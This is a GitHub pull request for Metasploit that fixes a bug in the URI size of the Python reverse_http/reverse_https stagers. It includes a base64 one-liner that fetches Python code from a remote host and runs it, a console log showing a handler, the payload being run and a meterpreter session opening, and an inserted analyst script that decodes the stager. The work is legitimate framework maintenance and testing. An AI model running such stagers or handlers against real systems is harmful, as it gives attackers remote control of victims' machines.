
Fix Python reverse_http & reverse_https #12443

Merged (1 commit), Oct 11, 2019

Conversation

zeroSteiner (Contributor) commented Oct 11, 2019

This pull request fixes a bug in Python's reverse_http and reverse_https stagers. There's an issue where, if the size is not large enough to store the UUID, the UUID will be omitted, causing the stager to fail to transfer and load.

This increases the size from 5 to 30, to allow the UUID to be included and then updates the payload's cached size. The bug affects both the HTTP and HTTPS versions due to the code reuse.

Verification

  • Start msfconsole
  • Run use payload/python/meterpreter/reverse_http
  • Set the options as appropriate
  • Run to_handler to start a handler
  • Run generate -f raw to get the stager
  • Execute the payload and get a functioning session

Original (Broken) Output

python3 -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJ10pCmhzPVtdCm89dWwuYnVpbGRfb3BlbmVyKCpocykKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJyldCmV4ZWMoby5vcGVuKCdodHRwOi8vMTkyLjE2OC45MC4xOjgwODAvQVlIODYnKS5yZWFkKCkpCg==')))"
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "<string>", line 7, in <module>
  File "<string>", line 1
    <html><body><h1>It works!</h1></body></html>
    ^
SyntaxError: invalid syntax

This bug seems to have been related to commit 5621d20.
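As an added analyst example (not code from the PR or from Metasploit), the following Python decodes the broken stager shown in the output above, pulls out the callback URL, the URI and the User-Agent, and flags a URI shorter than the 30 characters the PR settles on. The command line and base64 blob are copied verbatim from the PR; the sizes 5 and 30 come from the PR description (the exact minimum a UUID needs is not stated on the page, so 30 is used as the bar); the helper names and the regular expressions are this example's own.

```python
import base64
import re
from urllib.parse import urlsplit

# The exact command line from the PR's "Original (Broken) Output" section.
BROKEN_ONE_LINER = r'''python3 -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJ10pCmhzPVtdCm89dWwuYnVpbGRfb3BlbmVyKCpocykKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJyldCmV4ZWMoby5vcGVuKCdodHRwOi8vMTkyLjE2OC45MC4xOjgwODAvQVlIODYnKS5yZWFkKCkpCg==')))"'''

# Sizes quoted in the PR description: the broken stager asked for a 5-character
# URI; the fix raises this to 30 so the UUID is included. The true minimum for
# a UUID is not stated on the page, so 30 is the bar used here (assumption).
URI_LEN_BROKEN = 5
URI_LEN_FIXED = 30

# Single-quoted base64 literal (the stager body), a callback URL, and the UA header.
QUOTED_B64_RE = re.compile(r"'([A-Za-z0-9+/]+={0,2})'")
URL_RE = re.compile(r"https?://[^'\"\s)]+")
UA_RE = re.compile(r"\('User-Agent',\s*'([^']*)'\)")


def extract_blob(one_liner):
    """Return the longest single-quoted base64 literal in a captured one-liner."""
    candidates = QUOTED_B64_RE.findall(one_liner)
    if not candidates:
        raise ValueError("no base64 literal found in command line")
    return max(candidates, key=len)


def decode_stager(blob_b64):
    """Decode the blob to the Python source that the one-liner exec()s."""
    return base64.b64decode(blob_b64).decode("utf-8")


def triage_stager(stager_src):
    """Summarise callback URL(s), URI length and User-Agent of a decoded stager."""
    ua = UA_RE.search(stager_src)
    callbacks = []
    for url in URL_RE.findall(stager_src):
        parts = urlsplit(url)
        uri = parts.path.lstrip("/")
        callbacks.append({
            "url": url,
            "host": parts.hostname,
            "port": parts.port,
            "uri": uri,
            "uri_len": len(uri),
            # Too short to carry the UUID: the PR's traceback shows the stager
            # exec()ing an HTML page instead of a Python stage in that case.
            "uri_fits_uuid": len(uri) >= URI_LEN_FIXED,
        })
    return {
        "user_agent": ua.group(1) if ua else None,
        "uses_exec": "exec(" in stager_src,
        "callbacks": callbacks,
    }


def triage_one_liner(one_liner):
    """Full pipeline: captured command line -> decoded source -> summary."""
    return triage_stager(decode_stager(extract_blob(one_liner)))


if __name__ == "__main__":
    report = triage_one_liner(BROKEN_ONE_LINER)
    for cb in report["callbacks"]:
        print(f"{cb['url']}  uri_len={cb['uri_len']}  fits_uuid={cb['uri_fits_uuid']}")
    print("User-Agent:", report["user_agent"])
```

Run as-is it reports the 5-character URI `/AYH86` on the broken stager, which is the symptom the PR describes; the same `triage_stager` function applied to a stager generated after the fix would see a 30-character URI and pass the check. The decoded source is seven lines, which matches the `line 7` in the PR's traceback.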

zeroSteiner requested a review from OJ October 11, 2019 02:17
OJ self-assigned this Oct 11, 2019

OJ (Contributor) left a review comment:

LGTM. Typical that I'd be the jerk that ruined it in the first place!

OJ (Contributor) commented Oct 11, 2019

Attacker:

msf5 payload(python/meterpreter/reverse_http) > set LHOST 192.168.146.156
LHOST => 192.168.146.156
msf5 payload(python/meterpreter/reverse_http) > set LPORT 8888
LPORT => 8888
msf5 payload(python/meterpreter/reverse_http) > to_handler
[*] Payload Handler Started as Job 0
msf5 payload(python/meterpreter/reverse_http) > 
[*] Started HTTP reverse handler on http://192.168.146.156:8888

msf5 payload(python/meterpreter/reverse_http) > generate -f raw -o /tmp/met.py
[*] Writing 526 bytes to /tmp/met.py...

msf5 payload(python/meterpreter/reverse_http) > jobs

Jobs
====

  Id  Name                    Payload                          Payload opts
  --  ----                    -------                          ------------
  0   Exploit: multi/handler  python/meterpreter/reverse_http  http://192.168.146.156:8888

Victim:

$ python3 /tmp/met.py

Attacker:

msf5 payload(python/meterpreter/reverse_http) > 
[*] http://192.168.146.156:8888 handling request from 192.168.146.156; (UUID: x5kzdlt7) Staging python payload (53933 bytes) ...
[*] Meterpreter session 1 opened (192.168.146.156:8888 -> 192.168.146.156:36000) at 2019-10-11 14:45:04 +1000

msf5 payload(python/meterpreter/reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: oj

OJ added a commit that referenced this pull request Oct 11, 2019
OJ merged commit 85a39f7 into rapid7:master Oct 11, 2019
OJ (Contributor) commented Oct 11, 2019

Release Notes

This PR fixes an issue with the Python reverse_http and reverse_https payloads. Payload invocation worked, however the first stage was not being generated correctly, resulting in no session and an error being thrown from the Python interpreter. This PR fixes this issue by fixing cached sizes and URI sizes.

msjenkins-r7 pushed a commit that referenced this pull request Oct 11, 2019
tperry-r7 added the rn-fix (release notes fix) label Oct 30, 2019
zeroSteiner deleted the fix/python-http branch February 23, 2021 17:13
Labels: bug, rn-fix (release notes fix)